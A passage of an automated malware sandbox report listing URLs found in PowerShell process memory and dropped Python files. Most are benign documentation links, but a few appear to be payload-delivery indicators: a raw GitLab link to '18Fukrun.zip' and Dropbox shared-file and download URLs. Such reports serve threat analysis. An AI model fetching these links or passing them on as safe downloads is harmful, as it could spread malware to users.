            Source: asyncio-sync.html.17.drString found in binary or memory: https://github.com/python/cpython/blob/main/Doc/library/asyncio-sync.rst
            Source: asyncio.html.17.drString found in binary or memory: https://github.com/python/cpython/blob/main/Doc/library/asyncio.rst
            Source: audit_events.html.17.drString found in binary or memory: https://github.com/python/cpython/blob/main/Doc/library/audit_events.rst
            Source: bdb.html.17.drString found in binary or memory: https://github.com/python/cpython/blob/main/Doc/library/bdb.rst
            Source: bisect.html.17.drString found in binary or memory: https://github.com/python/cpython/blob/main/Doc/library/bisect.rst
            Source: codeop.html.17.drString found in binary or memory: https://github.com/python/cpython/blob/main/Doc/library/codeop.rst
            Source: concurrent.html.17.drString found in binary or memory: https://github.com/python/cpython/blob/main/Doc/library/concurrent.rst
            Source: contextvars.html.17.drString found in binary or memory: https://github.com/python/cpython/blob/main/Doc/library/contextvars.rst
            Source: copy.html.17.drString found in binary or memory: https://github.com/python/cpython/blob/main/Doc/library/copy.rst
            Source: crypto.html.17.drString found in binary or memory: https://github.com/python/cpython/blob/main/Doc/library/crypto.rst
            Source: curses.panel.html.17.drString found in binary or memory: https://github.com/python/cpython/blob/main/Doc/library/curses.panel.rst
            Source: datatypes.html.17.drString found in binary or memory: https://github.com/python/cpython/blob/main/Doc/library/datatypes.rst
            Source: development.html.17.drString found in binary or memory: https://github.com/python/cpython/blob/main/Doc/library/development.rst
            Source: email.charset.html.17.drString found in binary or memory: https://github.com/python/cpython/blob/main/Doc/library/email.charset.rst
            Source: email.iterators.html.17.drString found in binary or memory: https://github.com/python/cpython/blob/main/Doc/library/email.iterators.rst
            Source: email.mime.html.17.drString found in binary or memory: https://github.com/python/cpython/blob/main/Doc/library/email.mime.rst
            Source: email.html.17.drString found in binary or memory: https://github.com/python/cpython/blob/main/Doc/library/email.rst
            Source: email.utils.html.17.drString found in binary or memory: https://github.com/python/cpython/blob/main/Doc/library/email.utils.rst
            Source: exceptions.html.17.drString found in binary or memory: https://github.com/python/cpython/blob/main/Doc/library/exceptions.rst
            Source: fileformats.html.17.drString found in binary or memory: https://github.com/python/cpython/blob/main/Doc/library/fileformats.rst
            Source: frameworks.html.17.drString found in binary or memory: https://github.com/python/cpython/blob/main/Doc/library/frameworks.rst
            Source: gc.html.17.drString found in binary or memory: https://github.com/python/cpython/blob/main/Doc/library/gc.rst
            Source: gettext.html.17.drString found in binary or memory: https://github.com/python/cpython/blob/main/Doc/library/gettext.rst
            Source: grp.html.17.drString found in binary or memory: https://github.com/python/cpython/blob/main/Doc/library/grp.rst
            Source: gzip.html.17.drString found in binary or memory: https://github.com/python/cpython/blob/main/Doc/library/gzip.rst
            Source: html.html.17.drString found in binary or memory: https://github.com/python/cpython/blob/main/Doc/library/html.rst
            Source: powershell.exe, 00000011.00000002.2448283371.0000022F80227000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/blob/main/Doc/tutorial/floatingpoint.rst
            Source: isolating-extensions.html.17.drString found in binary or memory: https://github.com/python/cpython/blob/master/Modules/xxlimited.c
            Source: powershell.exe, 00000011.00000002.2448283371.0000022F807D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/pull/28073
            Source: ast.html.17.drString found in binary or memory: https://github.com/python/cpython/tree/3.12/Lib/ast.py
            Source: asyncio.html.17.drString found in binary or memory: https://github.com/python/cpython/tree/3.12/Lib/asyncio/
            Source: asyncio-sync.html.17.drString found in binary or memory: https://github.com/python/cpython/tree/3.12/Lib/asyncio/locks.py
            Source: asyncio-queue.html.17.drString found in binary or memory: https://github.com/python/cpython/tree/3.12/Lib/asyncio/queues.py
            Source: asyncio-runner.html.17.drString found in binary or memory: https://github.com/python/cpython/tree/3.12/Lib/asyncio/runners.py
            Source: bdb.html.17.drString found in binary or memory: https://github.com/python/cpython/tree/3.12/Lib/bdb.py
            Source: bisect.html.17.drString found in binary or memory: https://github.com/python/cpython/tree/3.12/Lib/bisect.py
            Source: codeop.html.17.drString found in binary or memory: https://github.com/python/cpython/tree/3.12/Lib/codeop.py
            Source: copy.html.17.drString found in binary or memory: https://github.com/python/cpython/tree/3.12/Lib/copy.py
            Source: email.html.17.drString found in binary or memory: https://github.com/python/cpython/tree/3.12/Lib/email/__init__.py
            Source: email.charset.html.17.drString found in binary or memory: https://github.com/python/cpython/tree/3.12/Lib/email/charset.py
            Source: email.iterators.html.17.drString found in binary or memory: https://github.com/python/cpython/tree/3.12/Lib/email/iterators.py
            Source: email.mime.html.17.drString found in binary or memory: https://github.com/python/cpython/tree/3.12/Lib/email/mime/
            Source: email.utils.html.17.drString found in binary or memory: https://github.com/python/cpython/tree/3.12/Lib/email/utils.py
            Source: gettext.html.17.drString found in binary or memory: https://github.com/python/cpython/tree/3.12/Lib/gettext.py
            Source: gzip.html.17.drString found in binary or memory: https://github.com/python/cpython/tree/3.12/Lib/gzip.py
            Source: html.html.17.drString found in binary or memory: https://github.com/python/cpython/tree/3.12/Lib/html/__init__.py
            Source: functional.html.17.drString found in binary or memory: https://github.com/python/cpython/tree/3.12/Lib/test/test_generators.py
            Source: exceptions.html.17.drString found in binary or memory: https://github.com/python/cpython/tree/3.12/Objects/exceptions.c
            Source: update_test_data.py.17.drString found in binary or memory: https://github.com/python/mypy/issues/8772
            Source: powershell.exe, 00000011.00000002.2448283371.0000022F80901000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/textualize
            Source: ssl_.py.17.drString found in binary or memory: https://github.com/urllib3/urllib3/issues/2192#issuecomment-821832963
            Source: ssl_.py.17.drString found in binary or memory: https://github.com/urllib3/urllib3/pull/3024
            Source: powershell.exe, 0000000F.00000002.1530028772.0000023E01620000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1530028772.0000023E00C32000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1530028772.0000023E01649000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gitlab.com
            Source: powershell.exe, 0000000F.00000002.1530028772.0000023E01649000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gitlab.com/-/sandbox/
            Source: powershell.exe, 0000000F.00000002.1530028772.0000023E01626000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1530028772.0000023E01649000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gitlab.com/-/sandbox/;
            Source: powershell.exe, 0000000F.00000002.1530028772.0000023E01649000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gitlab.com/-/speedscope/index.html
            Source: powershell.exe, 0000000F.00000002.1530028772.0000023E01649000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gitlab.com/admin/
            Source: powershell.exe, 0000000F.00000002.1530028772.0000023E01649000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gitlab.com/assets/
            Source: powershell.exe, 0000000F.00000002.1589412338.0000023E6FD99000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1530028772.0000023E00232000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gitlab.com/bose1511/mkt1511/-/raw/main/18Fukrun.zip
            Source: functional.html.17.drString found in binary or memory: https://gnosis.cx/TPiP/
            Source: powershell.exe, 0000000D.00000002.1380394770.00000187530C0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1530028772.0000023E00C32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
            Source: url.py.17.drString found in binary or memory: https://google.com/mail/
            Source: bisect.html.17.drString found in binary or memory: https://grantjenks.com/docs/sortedcollections/
            Source: ast.html.17.drString found in binary or memory: https://greentreesnakes.readthedocs.io/
            Source: ast.html.17.drString found in binary or memory: https://greentreesnakes.readthedocs.io/en/latest/
            Source: logging.html.17.drString found in binary or memory: https://groups.google.com/g/comp.lang.python
            Source: _raw_api.py.17.drString found in binary or memory: https://groups.google.com/u/1/g/python-cffi/c/oZkOIZ_zi5k
            Source: logging-cookbook.html.17.drString found in binary or memory: https://gunicorn.org/
            Source: powershell.exe, 0000000D.00000002.1380394770.0000018753593000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1380394770.000001875356F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1380394770.000001875358F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://help.dropbox.com/
            Source: powershell.exe, 0000000D.00000002.1380394770.0000018753593000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1380394770.000001875356F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1380394770.000001875358F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://instructorledlearning.dropboxbusiness.com/
            Source: unicode.html.17.drString found in binary or memory: https://jkorpela.fi/unicode/guide.html
            Source: powershell.exe, 00000011.00000002.2448283371.0000022F80227000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://jvns.ca/blog/2023/01/13/examples-of-floating-point-problems/
            Source: ast.html.17.drString found in binary or memory: https://leoeditor.com/appendices.html#leoast-py
            Source: asn1.py.17.drString found in binary or memory: https://letsencrypt.org/docs/a-warm-welcome-to-asn1-and-der/
            Source: ast.html.17.drString found in binary or memory: https://libcst.readthedocs.io/
            Source: powershell.exe, 00000011.00000002.2448283371.0000022F80D42000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2448283371.0000022F80D34000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2448283371.0000022F81DE0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2448283371.0000022F81979000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2448283371.0000022F81985000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://linuxreviews.org/HOWTO_change_the_mouse_speed_in_X
            Source: powershell.exe, 0000000D.00000002.1380394770.0000018753593000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1380394770.000001875356F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1380394770.000001875358F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://login.yahoo.com/
            Source: asn1.py.17.drString found in binary or memory: https://luca.ntop.org/Teaching/Appunti/asn1.html
            Source: isolating-extensions.html.17.drString found in binary or memory: https://mail.python.org/mailman3/lists/capi-sig.python.org/
            Source: asn1.py.17.drString found in binary or memory: https://misc.daniel-marschall.de/asn.1/oid-converter/online.php
            Source: functional.html.17.drString found in binary or memory: https://mitpress.mit.edu/sicp
            Source: powershell.exe, 0000000D.00000002.1380394770.0000018753593000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1380394770.000001875356F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1380394770.000001875358F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://navi.dropbox.jp/
            Source: unicode.html.17.drString found in binary or memory: https://nedbatchelder.com/text/unipain.html
            Source: powershell.exe, 0000000F.00000002.1530028772.0000023E01649000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://new-sentry.gitlab.net
            Source: powershell.exe, 0000000F.00000002.1530028772.0000023E01626000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1530028772.0000023E01649000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://new-sentry.gitlab.net/api/4/security/?sentry_key=f5573e26de8f4293b285e556c35dfd6e&sentry_env
            Source: powershell.exe, 0000000D.00000002.1380394770.000001875392C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1397199570.00000187620F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1397199570.0000018761FB6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1583417160.0000023E101B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1583417160.0000023E10074000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2536038120.0000022F90072000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
            Source: powershell.exe, 0000000D.00000002.1380394770.0000018753593000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1380394770.000001875356F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1380394770.000001875358F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://officeapps-df.live.com
            Source: powershell.exe, 0000000D.00000002.1380394770.0000018753593000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1380394770.000001875356F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1380394770.000001875358F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://officeapps.live.com
            Source: powershell.exe, 0000000D.00000002.1380394770.0000018753593000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1380394770.000001875356F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1380394770.000001875358F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://onedrive.live.com/picker
            Source: powershell.exe, 0000000D.00000002.1380394770.0000018753593000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1380394770.000001875356F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1380394770.000001875358F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pal-test.adyen.com
            Source: powershell.exe, 0000000D.00000002.1380394770.0000018753593000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1380394770.000001875356F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1380394770.000001875358F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://paper.dropbox.com/
            Source: powershell.exe, 0000000D.00000002.1380394770.0000018753593000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1380394770.000001875356F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1380394770.000001875358F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://paper.dropbox.com/cloud-docs/edit
            Source: ast.html.17.drString found in binary or memory: https://parso.readthedocs.io
            Source: unicode.html.17.drString found in binary or memory: https://peps.python.org/pep-0263/
            Source: functional.html.17.drString found in binary or memory: https://peps.python.org/pep-0289/
            Source: functional.html.17.drString found in binary or memory: https://peps.python.org/pep-0342/
            Source: exceptions.html.17.drString found in binary or memory: https://peps.python.org/pep-0387/
            Source: gc.html.17.drString found in binary or memory: https://peps.python.org/pep-0442/
            Source: exceptions.html.17.drString found in binary or memory: https://peps.python.org/pep-0475/
            Source: exceptions.html.17.drString found in binary or memory: https://peps.python.org/pep-0479/
            Source: ast.html.17.drString found in binary or memory: https://peps.python.org/pep-0484/
            Source: ast.html.17.drString found in binary or memory: https://peps.python.org/pep-0526/
            Source: exceptions.html.17.drString found in binary or memory: https://peps.python.org/pep-0565/
            Source: contextvars.html.17.drString found in binary or memory: https://peps.python.org/pep-0567/
            Source: audit_events.html.17.drString found in binary or memory: https://peps.python.org/pep-0578/
            Source: ast.html.17.drString found in binary or memory: https://peps.python.org/pep-3115/
            Source: exceptions.html.17.drString found in binary or memory: https://peps.python.org/pep-3134/
            Source: exceptions.html.17.drString found in binary or memory: https://peps.python.org/pep-3151/
            Source: powershell.exe, 0000000D.00000002.1380394770.0000018753593000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1380394770.000001875356F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1380394770.000001875358F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://photos.dropbox.com/
            Source: reporter.cpython-312.pyc.17.dr, reporter.py.17.drString found in binary or memory: https://pip.pypa.io/warnings/backtracking
            Source: logging-cookbook.html.17.drString found in binary or memory: https://pypi.org/project/PyQt5/
            Source: logging-cookbook.html.17.drString found in binary or memory: https://pypi.org/project/PySide2/
            Source: unicode.html.17.drString found in binary or memory: https://python-notes.curiousefficiency.org/en/latest/python3/text_file_processing.html
            Source: unicode.html.17.drString found in binary or memory: https://pyvideo.org/video/1768/the-guts-of-unicode-in-python
            Source: unicode.html.17.drString found in binary or memory: https://pyvideo.org/video/289/pycon-2010--mastering-python-3-i-o
            Source: powershell.exe, 0000000D.00000002.1380394770.0000018753593000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1380394770.000001875356F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1380394770.000001875358F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sales.dropboxbusiness.com/
            Source: powershell.exe, 00000011.00000002.2448283371.0000022F80227000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://scipy.org
            Source: powershell.exe, 0000000D.00000002.1380394770.0000018753593000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1380394770.000001875356F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1380394770.000001875358F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://selfguidedlearning.dropboxbusiness.com/
            Source: powershell.exe, 0000000F.00000002.1530028772.0000023E01649000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sentry.gitlab.net
            Source: powershell.exe, 0000000D.00000002.1380394770.0000018753593000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1380394770.000001875356F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1380394770.000001875358F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://showcase.dropbox.com/
            Source: powershell.exe, 0000000F.00000002.1530028772.0000023E01649000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://snowplow.trx.gitlab.net
            Source: powershell.exe, 0000000F.00000002.1530028772.0000023E01626000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1530028772.0000023E01649000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sourcegraph.com
            Source: powershell.exe, 00000011.00000002.2448283371.0000022F81E00000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2448283371.0000022F81E0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.apple.com/en-us/HT201236
            Source: ChaCha20.py.17.drString found in binary or memory: https://tools.ietf.org/html/draft-arciszewski-xchacha-03
            Source: pss.cpython-312.pyc.17.drString found in binary or memory: https://tools.ietf.org/html/rfc8017
            Source: powershell.exe, 00000011.00000002.2448283371.0000022F807D3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2448283371.0000022F807EB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc8017#page-28
            Source: powershell.exe, 00000011.00000002.2448283371.0000022F807D3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2448283371.0000022F807EB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc8017#page-29
            Source: pkcs1_15.cpython-312.pyc.17.drString found in binary or memory: https://tools.ietf.org/html/rfc8017#page-36
            Source: pkcs1_15.cpython-312.pyc.17.drString found in binary or memory: https://tools.ietf.org/html/rfc8017#page-37
            Source: pss.cpython-312.pyc.17.drString found in binary or memory: https://tools.ietf.org/html/rfc8017#page-67
            Source: pss.cpython-312.pyc.17.drString found in binary or memory: https://tools.ietf.org/html/rfc8017#section-8.1.1
            Source: pss.cpython-312.pyc.17.drString found in binary or memory: https://tools.ietf.org/html/rfc8017#section-8.1.2
            Source: powershell.exe, 00000011.00000002.2448283371.0000022F80901000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://twitter.com/willmcgugan
            Source: powershell.exe, 00000011.00000002.2448283371.0000022F80901000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://twitter.com/willmcguganz
            Source: powershell.exe, 0000000D.00000002.1380394770.0000018753593000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ucec8a788f965b69a40d3f9f21b4.dl.dropboxusercontent.com
            Source: powershell.exe, 0000000D.00000002.1380394770.0000018753593000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1380394770.000001875356F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1380394770.000001875358F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ucec8a788f965b69a40d3f9f21b4.dl.dropboxusercontent.com/cd/0/get/Cent9kswzwEN9hr7y-nSe5_7Gb6s
            Source: sorting.html.17.drString found in binary or memory: https://upload.wikimedia.org/wikipedia/commons/1/17/Balance_
            Source: logging-cookbook.html.17.drString found in binary or memory: https://uwsgi-docs.readthedocs.io/en/latest/
            Source: functional.html.17.drString found in binary or memory: https://www.defmacro.org/ramblings/fp.html
            Source: powershell.exe, 0000000D.00000002.1380394770.0000018753593000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1380394770.000001875356F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1380394770.000001875358F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.docsend.com/
            Source: powershell.exe, 0000000D.00000002.1380394770.0000018753569000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1380394770.00000187530C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com
            Source: powershell.exe, 0000000D.00000002.1380394770.0000018753593000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1380394770.000001875356F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1380394770.000001875358F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/
            Source: powershell.exe, 0000000D.00000002.1380394770.0000018753593000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1380394770.000001875356F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1380394770.000001875358F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/csp_log?policy_name=metaserver-whitelist
            Source: powershell.exe, 0000000D.00000002.1380394770.0000018753593000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1380394770.000001875356F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1380394770.000001875358F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/encrypted_folder_download/service_worker.js
            Source: powershell.exe, 0000000D.00000002.1380394770.0000018753593000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1380394770.000001875356F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1380394770.000001875358F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/page_success/
            Source: powershell.exe, 0000000D.00000002.1380394770.0000018753593000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1380394770.000001875356F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1380394770.000001875358F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/pithos/
            Source: powershell.exe, 0000000D.00000002.1380394770.0000018753593000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1380394770.000001875356F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1380394770.000001875358F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/playlist/
            Source: powershell.exe, 0000000D.00000002.1400342987.000001876A118000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/scl/fi/2xk4dviogo9yos
            Source: powershell.exe, 0000000D.00000002.1380394770.00000187535AF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1380394770.0000018752172000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1401370832.000001876A28C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/scl/fi/2xk4dviogo9yr2ose1z39/17_Advertising_Campaign_and_Collaboration.docx?
            Source: powershell.exe, 0000000D.00000002.1401333198.000001876A150000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/scl/fi/2xk4dviogo9yr2ose1z39/17_advertising_campaign_and_collaboration.docx?
            Source: powershell.exe, 0000000D.00000002.1380394770.0000018753593000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1380394770.000001875356F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1380394770.000001875358F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/service_worker.js
            Source: powershell.exe, 0000000D.00000002.1380394770.0000018753593000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1380394770.000001875356F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1380394770.000001875358F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/static/api/
            Source: powershell.exe, 0000000D.00000002.1380394770.000001875358F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/static/serviceworker/
            Source: powershell.exe, 0000000D.00000002.1380394770.0000018753593000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1380394770.000001875356F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1380394770.000001875358F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/v/s/playlist/
            Source: powershell.exe, 0000000D.00000002.1380394770.000001875358F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropboxstatic.com/static/
            Source: gettext.html.17.drString found in binary or memory: https://www.gnu.org/software/gettext/manual/gettext.html
            Source: powershell.exe, 0000000F.00000002.1530028772.0000023E01649000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/recaptcha/
            Source: powershell.exe, 0000000F.00000002.1530028772.0000023E01649000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com/ns.html
            Source: powershell.exe, 0000000D.00000002.1380394770.0000018753593000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1380394770.000001875356F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1380394770.000001875358F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1530028772.0000023E01626000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1530028772.0000023E01649000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/recaptcha/
            Source: functional.html.17.drString found in binary or memory: https://www.haskell.org/
            Source: powershell.exe, 0000000D.00000002.1380394770.0000018753593000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1380394770.000001875356F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1380394770.000001875358F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.hellofax.com/
            Source: powershell.exe, 0000000D.00000002.1380394770.0000018753593000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1380394770.000001875356F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1380394770.000001875358F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.hellosign.com/
            Source: asn1.py.17.drString found in binary or memory: https://www.itu.int/ITU-T/studygroups/com17/languages/X.690-0207.pdf
            Source: unicode.html.17.drString found in binary or memory: https://www.joelonsoftware.com/2003/10/08/the-absolute-minimum-every-software-developer-absolutely-p
            Source: asn1.py.17.drString found in binary or memory: https://www.oss.com/asn1/resources/books-whitepapers-pubs/larmouth-asn1-book.pdf
            Source: powershell.exe, 0000000D.00000002.1380394770.0000018753593000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1380394770.000001875356F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1380394770.000001875358F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.paypal.com/sdk/js
            Source: pyopenssl.cpython-312.pyc.17.drString found in binary or memory: https://www.pyopenssl.org
            Source: exceptions.html.17.drString found in binary or memory: https://www.python.org/
            Source: compatibility_tags.py.17.drString found in binary or memory: https://www.python.org/dev/peps/pep-0571/#backwards-compatibility-with-manylinux1-wheels
            Source: compatibility_tags.py.17.drString found in binary or memory: https://www.python.org/dev/peps/pep-0599/#backwards-compatibility-with-manylinux2010-wheels
            Source: powershell.exe, 00000011.00000002.2448283371.0000022F80227000.00000004.00000800.00020000.00000000.sdmp, asyncio-queue.html.17.dr, asyncio-sync.html.17.dr, bisect.html.17.dr, audit_events.html.17.dr, email.utils.html.17.dr, curses.panel.html.17.dr, unicode.html.17.dr, logging-cookbook.html.17.dr, gc.html.17.dr, codeop.html.17.dr, crypto.html.17.dr, sorting.html.17.dr, copy.html.17.dr, datatypes.html.17.dr, bdb.html.17.dr, fileformats.html.17.dr, asyncio-api-index.html.17.dr, asyncio-policy.html.17.dr, gzip.html.17.dr, asyncio.html.17.drString found in binary or memory: https://www.python.org/psf/donations/
            Source: logging-cookbook.html.17.drString found in binary or memory: https://www.qt.io/
